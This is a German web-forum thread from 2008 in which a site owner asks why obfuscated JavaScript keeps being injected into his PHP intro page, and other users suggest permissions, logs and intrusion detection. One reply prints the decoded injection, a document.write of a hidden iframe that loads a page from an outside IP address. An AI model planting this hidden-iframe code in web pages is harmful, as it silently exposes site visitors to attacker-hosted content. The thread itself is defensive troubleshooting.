» Willkommen Gast   | Registrieren

PC Forum
Offtopic
Antworten in:

Antwort auf
Benutzername:   Noch nicht registriert?
Passwort:   Passwort vergessen?
iB Code Einmal klicken um den Tag zu öffnen, nochmal klicken zum Schliessen

Top Smilies
Beitrag

HTML ist on für dieses Forum

IkonCode ist on für dieses Forum

SMILIES LEGENDE ansehen
Beitragsoptionen

 Möchten Sie Ihre Signatur hinzufügen?
Wollen Sie per Email über Antworten informiert werden?
Wollen Sie Emoticons in Ihrem Beitrag aktivieren?
 

Beitragsrückblick für (die neuesten Beiträge zuerst)
Netterzyp2004 Erstellt: 3:08 am 23. Mai 2008
ist warscheinlich eh nur ne proxy..
wakko0816 Erstellt: 2:55 am 23. Mai 2008
Zitat von The Edge um 0:44 am Mai 23, 2008

chmods sind auf 644/755, aber das spielt ja auch gar keine rolle, für den ftpzugriff braucht man ein passwort und da die scripts serverseitig geparsed werden, kann per http da schlecht dran manipuliert werden.

Gut. Wenn Dir das so klar ist, wieso kommst Du dann auf die verworrene Idee,
dass Du ein Opfer von Skript-Injection bist? Dass da plötzlich seltsamer
Javascript-Code in Deinem PHP-Skript steht hat auf jeden Fall eine andere
Ursache.
Wenn Dein Kumpel so viel drauf hat, hat er bestimmt ein Intrusion-Detection-
System (z.B. AIDE o.ä.) auf dem Server laufen. Wenn ja, könnte man mal
den Ordner für Deinen vHost mit in die Überwachung aufnehmen.

Was läuft denn da noch auf dem Server? Evtl. PHPbb? Gibt etliche PHP-
Skripte, über die Angreifer ganz leicht Zugriff auf die Konsole kriegen.

Übersetzt sieht das Javascript übrigens so aus:
Code

document.write('<iframe name=95536a src=\'http://77.221.133.150/.if/go.html?'+Math.round(Math.random()*196452)+'fc\' width=612 height=321 style=\'display: none\'></iframe>');

Laut "whois" darfst Du Dich bei irgendwelchen Leuten in Sankt Petersburg
beschweren. Und die haben sich schon einigermaßen Mühe gemacht, um den
Code für den iFrame zu verstecken....
The Edge Erstellt: 0:44 am 23. Mai 2008
@wakko der webhoster istn kumpel von mir und der hat einiges drauf - das war meine erste idee, dass irgendwo ne sicherheitslücke ist. das ist aber alles bis zum gehtnichtmehr durchgekaut und kann ausgeschlossen werden.

chmods sind auf 644/755, aber das spielt ja auch gar keine rolle, für den ftpzugriff braucht man ein passwort und da die scripts serverseitig geparsed werden, kann per http da schlecht dran manipuliert werden.

@township - "eine solche Seite rufe ich nicht auf." - was soll das denn heißen....


edit: achja - die leute, die mich noch kennen, wissen, dass ich alles andere als ein pc-noob bin - d.h. erschöpfende "grundkenntnisse" sind vorhanden. ich hab nur keine ahnung vom hacken.

(Geändert von The Edge um 0:46 am Mai 23, 2008)
tOWNshIP Erstellt: 20:05 am 22. Mai 2008
---

(Geändert von tOWNshIP um 19:45 am Jan. 23, 2010)
wakko0816 Erstellt: 18:47 am 22. Mai 2008
Wenn da echt neuer Code in der index.php auftaucht hast entweder Du
auf dem Webspace oder sogar Dein Provider ein massives Sicherheitsleck.
Wenn es wirklich nur Webspace ist hast Du wahrscheinlich keinen Zugriff
auf die Logdateien, aber wenn doch würde ich da zuerst nachschauen.

Als nächstes würde ich auf dringendst die Datei-Zugriffsrechte für die index.php
und für den Ordner an sich überprüfen und mal auf total schreibgeschützt setzen.
Das sollte recht einfach mit dem FTP-Programm gehen. Wenn Du Shell-Zugriff
hast "chmoddest" Du die Zugriffsrecht auf 444, denn das ist ja ein Linux-Server.
Anschließend würde ich noch das Änderungsdatum der Datei notieren, damit
Du bei der nächsten unerwünschten Modifikation der Datei weißt, wann das
passiert ist.

Wenn man nicht grad grobe Fehler gemacht hat sollte es nicht so ohne
weiteres möglich sein, Skripte auf dem Server zu verändern. Also wenn Du
sicher bist, dass Du da nix hast offen stehen lassen und Dein Passwort
einigermaßen sicher ist, würde ich auch mal den Hoster verständigen. Denn
evtl. hat DER ja nicht richtig aufgepasst.  
Weniger Antworten Mehr Antworten
The Edge Erstellt: 14:17 am 22. Mai 2008
das heisst?
Netterzyp2004 Erstellt: 14:15 am 22. Mai 2008
ehm


Trojaner Klicker? auf der kaputten?
The Edge Erstellt: 4:31 am 22. Mai 2008
ich habe hier ein script - sozusagen der introscreen meiner homepage.

allerdings habe ich alle 2 wochen das problem, dass irgendwer oder irgendwas sich in dieses script einhackt und das script so mit einem ziemlich dämlichen schrottinject lahmlegt.

(es sei dazu gesagt, dass ich scriptaculous auf meiner page verwende!... ich weiss nicht, ob/inwiefern es damit zusammenhängt.)

das php-script liegt eigentlich an der position http://seeeeeeeeeb.got.zlashed.com/index.php (dort habe ich z.Zt. alles an js auskommentiert)

hier der link zum script, wenn die injection schon passiert ist.

kaputte index.php

jemand ne idee, wie die injection in zeile 38 (das komische ding mit vielen hex-zahlen o.s.ä. direkt nach dem body-tag) da reingelangen kann?

methode, sicherheitslücke, grundkenntnisse in dem bereich - egal was ihr wisst hauts hier rein, damit ich herausfinde, wie das angehen kann, dass jemand/etwas in ein serverseitiges script etwas einhackt.

helft einem alten forumsoppa.

gruß!
×